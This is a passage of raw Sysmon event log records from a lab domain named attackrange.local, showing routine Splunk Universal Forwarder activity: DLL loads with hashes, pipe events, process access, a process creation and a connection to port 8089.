Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057344331Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.210{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057344330Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:11.210{8B6011A9-5ACF-618E-36F3-04000000F101}9168\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x800000000000000057344329Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.210{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057344328Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:11.210{8B6011A9-5ACF-618E-36F3-04000000F101}9168\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x800000000000000057344327Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.194{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057344326Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.194{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057344325Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.194{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057344324Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.194{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057344323Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057344322Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057344321Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057344320Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057344319Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057344318Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057344317Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057344316Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057344315Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057344314Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057344313Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057344312Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057344311Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057344310Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057344309Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057344308Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057344307Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057344306Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057344305Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057344304Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057344303Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057344302Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057344301Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057344300Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057344299Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057344298Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057344297Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057344296Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057344295Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057344294Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057344293Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057344292Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241trueSplunk, Inc.Valid 10341000x800000000000000057344291Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-8868-6164-0500-00000000F101}424548C:\Windows\system32\csrss.exe{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057344290Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.179{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057344289Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.164{8B6011A9-5ACF-618E-36F3-04000000F101}9168C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000057344288Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:11.163{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344287Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:15:11.163{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057344286Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:11.163{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344285Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:15:11.163{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057344284Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:11.163{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344283Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:15:11.163{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 354300x800000000000000021219289Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:59.495{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64299-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 10341000x800000000000000021219288Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:12.607{AD5E2759-5AD0-618E-01CE-08000000F101}6003504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021219287Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:12.419{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B44D958F5BCF8E3118DC2F5DC2B0B38,SHA256=3AA814590082E8E2070D4A6E6A316D394A673F265F70092B37A1933595097B73,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344402Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:12.463{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 